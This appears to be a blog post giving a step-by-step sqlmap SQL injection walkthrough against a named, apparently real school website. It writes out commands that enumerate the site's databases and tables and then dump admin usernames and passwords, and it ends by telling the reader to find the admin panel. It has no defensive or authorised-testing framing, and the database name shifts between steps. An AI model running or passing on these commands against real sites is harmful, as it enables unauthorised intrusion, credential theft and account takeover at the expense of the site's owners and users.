first of all we need a vulnerable target! here it is http://www.alliedschools.edu.pk/main_news.php?news_id=52 ok first step is to fatch the databases command will be like this one python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 –dbs here:- -u is stand for which is vulnerable to SQL injection and –dbs is used for fatching total databases in website
data:image/s3,"s3://crabby-images/05830/0583051cbc0dab6cec9418641277ed16219601e1" alt="1m"
ok after completing the process of fataching the databases it will something like that available databases(8) [*]informtion_schema [*]alliedschools_web
data:image/s3,"s3://crabby-images/b3435/b343502c82478a8f6f130641f9bba87bdd3023aa" alt="2m"
now we are going to expoit database alliedschools_web and fatch the tables present in it ok command will change a little bit :- python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_web --tables here :- -D and then name of the database from which we want to fatch tables and --tables is for fatching total table present in the database after processing we will get the tables present in database "alliedschools_web"
data:image/s3,"s3://crabby-images/11388/11388d09c5f078f50b5f6f8e0092d64c4f5f4d34" alt="3m"
after processing we will get something like that Database: alliedschools_campus [18 Tables ] admin campus
now we are going to fatch the cloumns from table admin of database alliedschools_campus command is :- python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_campus -T admin --columns
now we will get something like this Database: alliedschools_campus Table : admin [12 columns ] admin_password admin_username admin_email
This is the last command to get the admin username and password command is python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_campus -T admin -C admin_password, admin_username --dump
data:image/s3,"s3://crabby-images/9aab1/9aab1de2d8177febe2234fdd857dd2d18ffe61ca" alt="7m"
and after finishing process we will get something like that Database: alliedschools_campus Table : admin [6 entries] admin_password admin_username $erver admin ...... ......
Now You Have admin Password of website, Find admin panel
0 comments:
Post a Comment